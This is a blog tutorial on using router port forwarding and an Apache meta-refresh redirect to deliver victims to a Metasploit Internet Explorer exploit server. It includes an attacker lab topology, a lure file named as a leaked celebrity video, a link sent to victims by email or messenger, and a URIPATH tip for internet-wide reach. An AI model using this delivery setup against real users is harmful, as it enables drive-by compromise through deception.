Saturday 4 January 2014

How To Port Forward Browser Exploit From Router To Your Exploit Server

How To Port Forward Browser Exploit From Router To Your Exploit Server



Type : Tips and Trick
Level : Easy – Medium
tips and trick
This tips and trick "How to Port Forward Browser Exploit From Router to Your Exploit Server" I believe it will be useful for some of you who still confused about port redirection; BTW you can view my previous tutorialabout port redirection on Windows in this page 
On that post, there’s a comment from Nikos that ask how to forward from a router to your exploit server? I believe when he ask this maybe he’s a little confused with the URIPATH (it’s something like http://192.168.1.2/URIPATH), because if you use the SPI port forward on my previous post you can’t forward a web address, what you can do is only forward an IP address followed by port number (e.g : 192.168.1.5:8080) without any URIPATH.
Actually that’s why this tips and trick was made, to anticipate the problem where you can’t add a URIPATH to forward/redirect incoming connection to your exploit server.
Let’s start it…

Requirements :

1. Apache Web Server (this already bundled with Backtrack)
2. Exploit server (you can view and look to other hacking tutorial guide HERE)

Step by Step :

Here’s the topology for this case :
How to Port Forward Browser Exploit From Router to Your Exploit Server
Victim (Windows XP SP3) IP address : 192.168.8.93
Attacker Router (Windows 7 SP1) IP address : 192.168.8.89
Exploit Server / Attacker (Backtrack 5 R2) IP address : 192.168.8.91
1. Okay here’s the scene : Exploit server or we can call it attacker he send some malicious link to victim via e-mail or messenger, etc. Attacker has a router with public IP address and his computer was using a local IP address(192.168.8.91).
2. The picture below is what attacker do on his router to forward every incoming packet to port 80 to his computer local ip address on port 80.
How to Port Forward Browser Exploit From Router to Your Exploit Server
3. I use the exploit for this tips and trick from this hacking tutorial (http://vishnuvalentino.com/hacking-tutorial/exploiting-ms11_003-internet-explorer-vulnerability-using-metasploit-framework/) but I change the SRVPORToptions to default on port 8080. As you can see on the picture below, I’ve already start the exploit server to listen for every incoming connection.
How to Port Forward Browser Exploit From Router to Your Exploit Server
4. With this condition, if victim try to access 192.168.8.89 he will see nothing or even an error page. It’s because the attacker router can forward the packet that come to port 80 and forward it to 192.168.8.91 port 80, but on exploitserver port 80 wasn’t active and we need to activate it.
You can activate the apache web server by run this command on your terminal :
/etc/init.d/apache2 start
5. But the above command on step 4 it will result the following page on victim web browser :
How to Port Forward Browser Exploit From Router to Your Exploit Server
hey where’s the exploit??it’s a default apache page…
6. Because our exploit server was run on 192.168.8.91:8080/avril-video-leaked.avi not on port 80 so we need to redirect it to the proper location. here’ the step :
Open your terminal (CTRL + ALT + T) and type :
pico /var/www/index.html
to edit the default index.html page; and then add the following code :
<meta http-equiv="refresh" content="0;url=http://192.168.8.91:8080/avril-video-leaked.avi" />
to redirect the default index.html page to our exploit server (see picture below).
How to Port Forward Browser Exploit From Router to Your Exploit Server
Press CTRL to save and press CTRL to quit.
7. Now every request page to attacker apache default server will be redirected to exploit server.
8. Why not give a try on your own machine?
Hope it’s useful :-)

F.A.Q :

1. Will this method redirect it correctly to my exploit server?
Answer : Yes of course if you set it correctly
2. Above this post you give an update that this method only work  for network with 2 network address…how if I want to do it from WAN / INTERNET?
Answer : Make sure while you set up URIPATH you add an empty string like this
set URIPATH ""
so your router (see step 2) can forward directly every incoming packet to your exploit server.